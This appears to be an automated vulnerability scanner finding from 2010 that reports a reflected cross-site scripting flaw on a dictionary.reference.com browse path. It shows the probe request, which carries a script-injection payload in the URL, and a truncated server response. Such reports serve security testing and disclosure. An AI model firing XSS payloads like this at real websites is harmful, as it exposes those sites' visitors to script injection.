1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://dictionary |
Path: | /browse/turn |
GET /browse/turn4efa7'-alert(1)- Host: dictionary.reference.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 17:53:41 GMT Server: Apache Cache-Control: private Content-Type: text/html;charset=UTF-8 Set-Cookie: classicef=3ae7a17daa Set-Cookie: NewUser=|ds1; Domain=reference.com; Expires=Sun, 20-Nov-2011 17:53:41 GMT; Path=/ Set-Cookie: accepting=1; Domain=.reference.com; Expires=Sun, 20-Nov-2011 17:53:41 GMT; Path=/ Connection: close Content-Length: 44233 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html xmlns="http://www.w3.org <head ...[SNIP]... <script type="text/javascript"> function adcall(){ var adTarget; adTarget ='/site=dictionary.com mywindow=window.open ("","mywindow","status=1" mywindow.document.write(' ...[SNIP]... |